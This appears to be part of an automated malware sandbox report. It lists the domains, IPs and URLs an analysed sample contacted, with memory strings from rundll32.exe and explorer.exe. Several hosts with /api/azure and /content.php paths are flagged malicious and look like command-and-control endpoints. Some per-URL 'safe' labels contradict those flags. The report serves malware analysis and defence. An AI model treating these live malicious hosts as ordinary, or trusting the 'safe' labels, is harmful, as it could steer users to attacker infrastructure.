                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php40%Avira URL Cloudsafe
                      https://altynbe.com/=~0%Avira URL Cloudsafe
                      https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/n0%Avira URL Cloudsafe
                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php0%Avira URL Cloudsafe
                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurep&j0%Avira URL Cloudsafe
                      https://workspacin.cloud/live/0%Avira URL Cloudsafe
                      https://anikvan.com/api/azure0%Avira URL Cloudsafe
                      https://altynbe.com/api/azurep0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      workspacin.cloud
                      		104.21.16.155
                      		truetrue
                        		unknown
                        ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.com
                        		3.69.236.35
                        		truefalse
                          		high
                          boriz400.com
                          		91.194.11.183
                          		truetrue
                            		unknown
                            altynbe.com
                            		138.124.183.215
                            		truetrue
                              		unknown
                              anikvan.com
                              		95.164.68.73
                              		truetrue
                                		unknown
                                ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.com
                                		54.175.181.104
                                		truefalse
                                  		high
                                  uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io
                                  		unknown
                                  		unknownfalse
                                    		unknown
                                    ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io
                                    		unknown
                                    		unknownfalse
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      https://illoskanawer.com/live/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azuretrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://anikvan.com/content.phptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/api/azuretrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://altynbe.com/content.phptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://boriz400.com/api/azuretrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://altynbe.com/api/azuretrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://boriz400.com/content.phptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.phptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://workspacin.cloud/live/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://anikvan.com/api/azuretrue
                                      • Avira URL Cloud: safe
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://aka.ms/odirmrexplorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		high
                                        https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure4rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		high
                                          https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure=rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810618243.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://altynbe.com/tyk.iorundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000016.00000000.1847916203.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high
                                            https://boriz400.com/api/azureyrundll32.exe, 00000012.00000003.2762031046.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882651450.00000292115BC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure(rundll32.exe, 00000012.00000002.2938154508.00000292115EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://excel.office.comexplorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.phpPrundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://anikvan.com/I~rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/frundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000016.00000002.2945734291.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://anikvan.com/rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php1jrundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://anikvan.com/content.php.frundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000016.00000000.1859052974.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2945734291.000000000C964000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://wns.windows.com/Lexplorer.exe, 00000016.00000000.1859052974.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2945734291.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.php4rundll32.exe, 00000012.00000003.2284190577.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.000002921159F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://word.office.comexplorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://workspacin.cloud/live/0vaHexplorer.exe, 00000016.00000002.2943554599.00000000098A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://altynbe.com/U~rundll32.exe, 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://altynbe.com/B_Frundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://workspacin.cloud/live/6explorer.exe, 00000016.00000002.2947027390.000000000CA7C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/Frundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://anikvan.com/content.phpGfrundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://altynbe.com/content.php2frundll32.exe, 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://anikvan.com/api/azuret.php.frundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpLrundll32.exe, 00000012.00000003.2810418995.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921159F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://altynbe.com/rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://android.notify.windows.com/iOSexplorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://anikvan.com/drundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurent.phprundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://altynbe.com/api/azureontent.phpMfErundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurep1jrundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://outlook.com_explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		low
                                                                                  https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://workspacin.cloud/live/J5explorer.exe, 00000016.00000002.2947027390.000000000CA7C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpArundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpLgFrundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure.phprundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php&jrundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://boriz400.com/qarundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://powerpoint.office.comcemberexplorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
